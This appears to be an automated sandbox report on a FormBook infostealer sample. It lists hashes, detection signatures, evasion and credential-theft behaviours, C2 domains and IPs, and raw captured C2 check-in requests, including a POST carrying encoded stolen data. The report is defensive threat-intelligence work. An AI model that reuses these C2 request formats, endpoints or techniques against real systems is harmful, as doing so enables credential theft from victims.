Windows Analysis Report
ekte.exe

Overview

General Information

Sample name: ekte.exe
Analysis ID: 1538477
MD5: a0f5d21ab28654f9310e591044950160
SHA1: 2da8c07b8f8e3b1ff29cb2f7db8419642c0a42e5
SHA256: c74e38c2e961cbbc34e20669e3deb4b31beebc94824b096c88d8aad8b75c4dcf
Infos:

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

AV Detection
barindex
Antivirus / Scanner detection for submitted sample
Source: ekte.exe Avira: detected
Antivirus detection for dropped file
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Avira: detection malicious, Label: TR/Kryptik.oucnm
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe ReversingLabs: Detection: 63%
Multi AV Scanner detection for submitted file
Source: ekte.exe ReversingLabs: Detection: 63%
Yara detected FormBook
Source: Yara match File source: 8.2.ekte.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 8.2.ekte.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000013.00000002.626531753.00000000000E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.417743791.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.416525445.00000000001D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.476152152.0000000000210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626483718.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000014.00000002.626793041.0000000000600000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.626660475.0000000000220000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.626744301.0000000002980000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.419884828.0000000001490000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
AI detected suspicious sample
Source: Submited Sample Integrated Neural Analysis Model: Matched 100.0% probability
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Joe Sandbox ML: detected
Machine Learning detection for sample
Source: ekte.exe Joe Sandbox ML: detected
Uses 32bit PE files
Source: ekte.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: ekte.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BuhvZTwGQCD.exe, 0000000F.00000000.392786817.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp, BuhvZTwGQCD.exe, 00000014.00000000.430916878.00000000003EE000.00000002.00000001.01000000.0000000B.sdmp
Source: Binary string: findstr.pdb source: ekte.exe, 00000008.00000002.417831173.00000000008C6000.00000004.00000020.00020000.00000000.sdmp, ekte.exe, 00000008.00000002.417831173.00000000008B4000.00000004.00000020.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404452776.0000000000519000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404444486.0000000000512000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626564118.000000000051F000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000003.404459780.000000000051E000.00000004.00000001.00020000.00000000.sdmp, BuhvZTwGQCD.exe, 0000000F.00000002.626548218.0000000000514000.00000004.00000001.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb source: ekte.exe, ekte.exe, 00000008.00000002.418645615.00000000009A0000.00000040.00001000.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 00000012.00000002.424622705.0000000000B9C000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.417719669.0000000001FA0000.00000004.00000020.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.0000000002130000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000002.626959404.00000000022B0000.00000040.00001000.00020000.00000000.sdmp, findstr.exe, 00000013.00000003.414891316.0000000001E40000.00000004.00000020.00020000.00000000.sdmp
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\ekte.exe Code function: 4x nop then jmp 00CA275Bh 0_2_00CA1E3F
Source: C:\Users\user\AppData\Roaming\eFDiSxeTfjUqTk.exe Code function: 4x nop then jmp 00A5202Bh 10_2_00A5170F

Networking
barindex
Suricata IDS alerts for network traffic
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49167 -> 3.33.130.190:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49174 -> 162.0.238.246:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49183 -> 206.119.82.148:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49184 -> 206.119.82.148:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49176 -> 162.0.238.246:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49187 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49173 -> 185.174.173.22:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49189 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49170 -> 185.174.173.22:80
Source: Network traffic Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.22:49170 -> 185.174.173.22:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49182 -> 206.119.82.148:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49172 -> 185.174.173.22:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49179 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49185 -> 206.119.82.148:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49178 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49190 -> 208.91.197.27:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49186 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49180 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49177 -> 162.0.238.246:80
Source: Network traffic Suricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.22:49181 -> 15.197.148.33:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49175 -> 162.0.238.246:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49171 -> 185.174.173.22:80
Source: Network traffic Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.22:49188 -> 15.197.148.33:80
Performs DNS queries to domains with low reputation
Source: C:\Program Files (x86)\MRHRLVjrcMJazhpubNnYGXyfuCIwnJCyDGTMAAlqhcuDHJPaYzen\BuhvZTwGQCD.exe DNS query: www.guldeu.xyz
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 162.0.238.246 162.0.238.246
Source: Joe Sandbox View IP Address: 15.197.148.33 15.197.148.33
Source: Joe Sandbox View IP Address: 45.33.6.223 45.33.6.223
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: NAMECHEAP-NETUS NAMECHEAP-NETUS
Source: Joe Sandbox View ASN Name: TANDEMUS TANDEMUS
Source: Joe Sandbox View ASN Name: ITLDC-NLUA ITLDC-NLUA
Source: C:\Windows\SysWOW64\findstr.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sqlite-dll-win32-x86-3180000[1].zip Jump to behavior
Source: global traffic HTTP traffic detected: GET /7qh8/?o0I8bJWh=30gz3aeCGXts4Q76IE+H941JnGeso7u8ST9k2gxA0wQlWv8qAc7eS7l6bdvqrf9uLD1EZ4RKxD3BFAyB/gyNnMcHzfUP1SI6JZ3kLHzdYP32mYCFOTVusz8SPvQZ&IzCDX=JREpwHC8S HTTP/1.1Host: www.deikamalaharris.infoAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: global traffic HTTP traffic detected: GET /2021/sqlite-dll-win32-x86-3340000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /2017/sqlite-dll-win32-x86-3180000.zip HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36Host: www.sqlite.orgConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /0804/?o0I8bJWh=7cQ5BE5RBCqgXF7xrBGoHohDXivjQLfe2KgDJ9LuiE6tpBU04a3sAbwq5Q7Yjj3JjwmtcjT9zhxyx84N9Ed0ZJTtf47MgLeYfgSXfectTV2gRR6PHDayMxuKrOIC&IzCDX=JREpwHC8S HTTP/1.1Host: www.rockbull.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: global traffic HTTP traffic detected: GET /qd68/?o0I8bJWh=CMk3jWV7n2ud16JbSoz++xJaAy6tYmolV54GWsIImY9wr32Fxex2EERnMtANYc4DvCE1goWK72es3TtLYGEc3O5acPz147mgbIRl7hCPTM53qHiPKqWo/3UkWZwG&IzCDX=JREpwHC8S HTTP/1.1Host: www.guldeu.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: global traffic HTTP traffic detected: GET /rmem/?o0I8bJWh=3mrg4OdF971xdpR9JqOipvCghMgMNm9pdqQXdKBxeUX/uUFHRyFRUgP+leOKIhGfNBOtjijimK07Q8HHjxhFaJ4HohJ/XqsVK02RuScXQBf97wXpW/1str23dyM9&IzCDX=JREpwHC8S HTTP/1.1Host: www.asiapartnars.onlineAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: global traffic HTTP traffic detected: GET /v5ff/?o0I8bJWh=6KtkYrJQJQPjnaYYjYn2UYf3+tCUC2UyI0IqyotYPNah/j4zRWdFJ7rRvhmSGGewLKOTJjNwEsTAi0VkpGXovzF7okvrkNx58uXZpArpUgDeiKoUGkOd+5nnUTXs&IzCDX=JREpwHC8S HTTP/1.1Host: www.wdgb23.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: global traffic HTTP traffic detected: GET /0l08/?o0I8bJWh=WYzw3m0wqer1rwFfiUwXr6rnqmqwc587r0oEUdRC5DK7wXWam3jpYKn/a30V+PURl6w9nm91Zal+YxrVMngOiDDKZET7LCtjetsFGO1YqrEJE528b4AnIbgsZ84h&IzCDX=JREpwHC8S HTTP/1.1Host: www.childlesscatlady.todayAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
Source: ekte.exe, 00000000.00000002.375617011.000000000075D000.00000004.00000020.00020000.00000000.sdmp, eFDiSxeTfjUqTk.exe, 0000000A.00000002.409649909.00000000004EE000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: global traffic DNS traffic detected: DNS query: www.deikamalaharris.info
Source: global traffic DNS traffic detected: DNS query: www.sqlite.org
Source: global traffic DNS traffic detected: DNS query: www.rockbull.pro
Source: global traffic DNS traffic detected: DNS query: www.timetime.store
Source: global traffic DNS traffic detected: DNS query: www.guldeu.xyz
Source: global traffic DNS traffic detected: DNS query: www.asiapartnars.online
Source: global traffic DNS traffic detected: DNS query: www.wdgb23.top
Source: global traffic DNS traffic detected: DNS query: www.childlesscatlady.today
Source: global traffic DNS traffic detected: DNS query: www.martaschrimpf.info
Source: unknown HTTP traffic detected: POST /0804/ HTTP/1.1Host: www.rockbull.proAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8Accept-Language: en-US,en;q=0.9Accept-Encoding: gzip, deflateOrigin: http://www.rockbull.proContent-Length: 2165Content-Type: application/x-www-form-urlencodedCache-Control: max-age=0Connection: closeReferer: http://www.rockbull.pro/0804/User-Agent: Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36Data Raw: 6f 30 49 38 62 4a 57 68 3d 32 65 34 5a 43 77 64 78 65 44 36 41 65 47 61 41 69 6a 71 5a 54 49 5a 46 65 55 47 68 46 36 43 56 32 72 39 63 59 2b 72 65 6a 44 57 66 71 54 77 34 74 4a 47 76 48 35 38 2f 2f 47 7a 4f 6f 32 69 55 30 51 53 64 63 41 7a 54 67 47 5a 5a 7a 35 4d 48 71 68 4a 52 5a 71 62 74 65 75 44 4e 6a 5a 4b 6f 66 67 2f 4b 5a 36 59 48 66 32 58 35 51 6a 71 37 46 31 53 54 4b 77 65 51 68 4f 6c 37 50 6b 62 77 6c 46 76 51 51 68 72 41 49 4e 6a 30 63 70 6d 62 2f 77 59 61 78 49 6f 67 72 64 76 6a 6a 70 2b 56 6b 43 45 66 76 41 35 7a 70 6d 4a 36 4f 34 30 6b 33 76 58 4c 6d 6c 62 70 34 36 41 51 51 31 65 32 48 53 67 64 6d 61 69 44 38 71 76 73 75 58 41 2b 79 4b 47 4d 39 51 68 74 4d 63 33 33 54 55 55 53 2f 63 69 32 75 46 78 61 7a 57 62 7a 59 5a 72 47 61 4f 57 51 69 37 6e 77 61 75 42 65 48 46 4d 6f 4c 4b 68 6e 69 65 4d 56 6b 44 61 36 47 41 35 74 69 4d 51 5a 68 53 2b 62 57 66 7a 48 54 4e 55 5a 38 62 76 58 63 75 74 66 6f 4e 54 64 65 49 6f 50 6f 64 69 4d 77 71 41 4f 37 70 70 4e 6d 4b 59 79 32 31 46 64 79 32 79 59 6d 7a 36 62 36 46 74 56 56 39 30 57 32 66 79 54 70 64 31 46 35 31 78 44 43 34 6f 77 47 55 4a 64 36 38 76 35 6e 63 76 53 42 72 2b 66 6e 49 4b 6a 63 66 6c 64 72 51 56 6a 6a 6d 56 75 34 51 6d 66 2b 64 58 45 4d 4b 49 4b 51 57 38 74 64 33 6b 6c 49 43 64 56 55 33 67 55 31 70 78 55 6f 38 32 46 4a 6b 73 6a 61 77 45 62 6e 63 44 71 2b 69 73 57 69 2f 35 44 64 43 53 52 71 76 47 69 4b 73 4c 4c 4f 49 53 74 38 42 49 63 59 6e 75 69 69 65 79 77 64 6b 75 4d 30 55 35 2f 57 79 33 66 45 4d 7a 57 74 7a 75 34 7a 79 65 64 4e 38 65 42 52 55 2f 55 44 34 72 48 36 74 66 72 38 56 30 51 2f 76 4e 6b 39 37 32 59 6d 32 37 51 48 4c 65 4b 72 68 5a 68 72 44 69 71 56 52 45 73 45 6e 47 46 66 47 56 6a 47 75 47 4f 6c 6d 34 4e 77 75 76 51 56 63 63 4b 5a 71 70 4c 43 42 49 2b 47 32 6e 79 32 65 52 39 46 6c 39 47 66 61 35 77 70 61 76 4a 61 2f 67 56 31 57 7a 39 4c 71 4e 78 74 51 6d 65 32 79 5a 79 64 6d 46 4c 42 54 46 32 59 74 41 69 54 49 62 46 35 79 57 42 41 4c 46 41 75 78 7a 53 54 4a 79 38 73 6d 43 4c 36 36 6f 55 33 63 6d 6b 61 4e 45 38 58 67 6f 62 36 77 71 61 34 6c 6f 36 45 34 56 46 37 6b 45 2f 37 39 76 73 76 4f 68 79 66 6d 57 34 37 71 4d 4c 68 2b 52 38 4e 77 73 6c 6e 62 6c 53 55 31 50 53 38 49 4a 44 53 67 47 63 65 4a 77 33 57 79 69 69 78 6c 69 4b 39 31 76 70 75 72 59 42 51 55 54 79 68 72 65 55 76 74 74 64 6d 68 42 59 6a 66 34 51 79 56 6b 6a 70 54 79 4f 71 4e 33 59 62 52 6d 54 4e 47 78 39 56 50 57 6a 75 6d 2f 30 55 49 6c 37 34 72 4e 35 44 73 33 50 44 76 43 70 4f 54 42 70 68 45
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closeDate: Mon, 21 Oct 2024 11:15:25 GMTContent-type: text/html; charset=utf-8Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 20 6c 69 6e 65 6e 6f 3d 22 33 38 30 22 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 6f 63 75 6d 65 6e 74 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 2f 32 30 32 31 2f 73 71 6c 69 74 65 2d 64 6c 6c 2d 77 69 6e 33 32 2d 78 38 36 2d 33 33 34 30 30 30 30 2e 7a 69 70 20 69 73 20 6e 6f 74 20 61 76 61 69 6c 61 62 6c 65 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title lineno="380">Not Found</title></head><body><h1>Document Not Found</h1>The document /2021/sqlite-dll-win32-x86-3340000.zip is not available on this server</body></html>
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:36 GMTserver: LiteSpeedData Raw: 61 37 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 db 6e db 38 f6 b9 f9 0a 9a 0f b6 38 d5 2d 4e 93 14 76 94 6e a7 ed 0c 66 d1 d9 0e 7a c1 62 11 07 0b 9a 3a 92 99 4a a4 96 a4 ec 18 ae ff 7d 41 4a 8e 65 3b 33 db d9 8e 1b 04 88 78 78 78 ee 37 32 57 bd d7 ef 5e 7d fc d7 6f 6f d0 cc 94 c5 f5 c9 95 fd 83 0a 2a f2 04 83 c0 d7 27 27 57 33 a0 e9 f5 09 42 08 5d 95 60 28 62 33 aa 34 98 04 7f fa f8 53 f0 1c a3 a8 bb 29 68 09 09 9e 73 58 54 52 19 8c 98 14 06 84 49 f0 82 a7 66 96 a4 30 e7 0c 02 b7 f0 11 17 dc 70 5a 04 9a d1 02 92 d3 30 de 23 56 29 59 81 32 cb 04 cb 7c c4 4b 9a 43 87 60 b4 a8 82 96 7a 54 57 85 a4 a9 8e 86 f1 70 18 c5 e7 d1 4c 96 50 d1 1c 02 2b 3b a8 80 97 79 58 89 1c 1f 4a aa e4 54 1a dd 21 2b 24 17 29 dc fb 48 c8 4c 16 85 5c e0 8d 7e 86 9b 02 ae df 4b f6 79 5a 17 05 0a d0 bb 2c e3 8c d3 e2 2a 6a b6 1a 1b f5 82 00 65 52 98 80 2e 40 cb 12 10 0a 82 96 af 66 8a 57 06 69 c5 12 1c 86 51 f3 fb 99 9b d0 e2 b7 e8 21 93 65 34 4d d9 f3 67 10 5f 9e 4e c3 3b 2b 9c 92 5a 4b c5 73 2e 12 4c 85 14 cb 52 d6 1a 5f 5f 45 0d c5 96 fc ae 80 bb 52 15 5c 7c 46 0a 8a 04 eb 99 54 86 d5 06 71 26 05 46 33 05 59 82 ff c8 98 19 9d 5b 54 67 40 64 96 15 24 d8 f9 22 ba 0f 1a 12 1b 03 59 cd 93 ee 8f b3 83 de 83 3d 58 c3 8a e4 4c 66 43 cb fe 34 a2 cc 8c a9 f4 28 8a ac 4d 74 98 4b 99 17 40 2b ae 9d 61 98 d6 c3 17 19 2d 79 b1 4c 7e 11 06 d4 68 91 cf cc df 9e c5 f1 f8 3c 8e c7 17 71 3c be 8c e3 3e 2d ab 71 8b f5 9b ac 2a 2e 74 83 67 71 36 fb 29 d7 55 41 97 89 5e d0 0a ef c8 d1 98 c9 2c 0b d0 33 00 d3 6c 46 36 15 ac 86 36 0f 9c 35 1b 71 a9 d6 60 74 c4 b4 8e a6 52 1a 6d 14 ad 42 a6 35 6e ad bd 25 83 a2 6b ab fb ff 20 22 17 45 c8 a8 92 b5 86 22 2c b9 f8 16 5a 29 64 b4 2e cc 9f 20 b1 af 7a eb 93 8e 92 da 2a 64 29 be 98 27 43 9b af 0f fe b4 c6 f9 b9 90 53 5a 20 cd 0d 20 43 73 e4 e5 86 e6 e1 9d 26 28 40 3f 3b 57 a2 97 82 16 4b c3 99 3e c8 0b aa 97 82 35 d9 b1 09 82 c5 62 d1 86 80 a1 79 49 05 cd 41 b9 40 b0 74 a3 3b fd 82 a7 c9 a7 97 c1 e9 c5 e5 d9 e5 e9 f9 e9 30 38 3d c8 8a 6e 8a 58 e7 2d b8 48 e5 22 4c a9 a1 6f e9 12 14 4a 0e 41 5f be a0 9b db f1 43 50 64 b5 60 86 4b 81 2c 57 8f ac 1e ce 86 55 ad 67 1e 55 79 5d 82 30 9a 8c d7 0f 67 1c ea e0 4e 0f 7c 24 60 81 5e 53 03 1e 21 e3 93 3d 04 26 45 c6 f3 81 8f 06 bb 6a 0c 48 c3 7e 9b e2 ee 60 53 81 5d 91 1d 34 a5 6b f0 50 62 07 07 a5 6b 60 6b 73 13 ac d6 b1 83 54 e8 a0 52 90 81 61 b3 41 e3 da 41 14 a9 b6 a2 85 95 92 5f 77 e2 b1 d4 6c 4e b6 15 ae a9 12 06 ee 4d 74 47 e7 b4 81 e2 eb 93 e8 07 74 d5 bb 79 f5 fa e5 c7 97 37 e8 87 e8 a4 f5 c5 bf 17 15 94 f2 8e 7f 00 Data Ascii: a71n88-Nvnfzb:J}AJe;3
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closex-powered-by: PHP/8.1.29expires: Wed, 11 Jan 1984 05:00:00 GMTcache-control: no-cache, must-revalidate, max-age=0content-type: text/html; charset=UTF-8link: <https://rockbull.pro/wp-json/>; rel="https://api.w.org/"transfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Mon, 21 Oct 2024 11:15:39 GMTserver: LiteSpeedData Raw: 61 37 31 0d 0a 1f 8b 08 00 00 00 00 00 00 03 bc 19 db 6e db 38 f6 b9 f9 0a 9a 0f b6 38 d5 2d 4e 93 14 76 94 6e a7 ed 0c 66 d1 d9 0e 7a c1 62 11 07 0b 9a 3a 92 99 4a a4 96 a4 ec 18 ae ff 7d 41 4a 8e 65 3b 33 db d9 8e 1b 04 88 78 78 78 ee 37 32 57 bd d7 ef 5e 7d fc d7 6f 6f d0 cc 94 c5 f5 c9 95 fd 83 0a 2a f2 04 83 c0 d7 27 27 57 33 a0 e9 f5 09 42 08 5d 95 60 28 62 33 aa 34 98 04 7f fa f8 53 f0 1c a3 a8 bb 29 68 09 09 9e 73 58 54 52 19 8c 98 14 06 84 49 f0 82 a7 66 96 a4 30 e7 0c 02 b7 f0 11 17 dc 70 5a 04 9a d1 02 92 d3 30 de 23 56 29 59 81 32 cb 04 cb 7c c4 4b 9a 43 87 60 b4 a8 82 96 7a 54 57 85 a4 a9 8e 86 f1 70 18 c5 e7 d1 4c 96 50 d1 1c 02 2b 3b a8 80 97 79 58 89 1c 1f 4a aa e4 54 1a dd 21 2b 24 17 29 dc fb 48 c8 4c 16 85 5c e0 8d 7e 86 9b 02 ae df 4b f6 79 5a 17 05 0a d0 bb 2c e3 8c d3 e2 2a 6a b6 1a 1b f5 82 00 65 52 98 80 2e 40 cb 12 10 0a 82 96 af 66 8a 57 06 69 c5 12 1c 86 51 f3 fb 99 9b d0 e2 b7 e8 21 93 65 34 4d d9 f3 67 10 5f 9e 4e c3 3b 2b 9c 92 5a 4b c5 73 2e 12 4c 85 14 cb 52 d6 1a 5f 5f 45 0d c5 96 fc ae 80 bb 52 15 5c 7c 46 0a 8a 04 eb 99 54 86 d5 06 71 26 05 46 33 05 59 82 ff c8 98 19 9d 5b 54 67 40 64 96 15 24 d8 f9 22 ba 0f 1a 12 1b 03 59 cd 93 ee 8f b3 83 de 83 3d 58 c3 8a e4 4c 66 43 cb fe 34 a2 cc 8c a9 f4 28 8a ac 4d 74 98 4b 99 17 40 2b ae 9d 61 98 d6 c3 17 19 2d 79 b1 4c 7e 11 06 d4 68 91 cf cc df 9e c5 f1 f8 3c 8e c7 17 71 3c be 8c e3 3e 2d ab 71 8b f5 9b ac 2a 2e 74 83 67 71 36 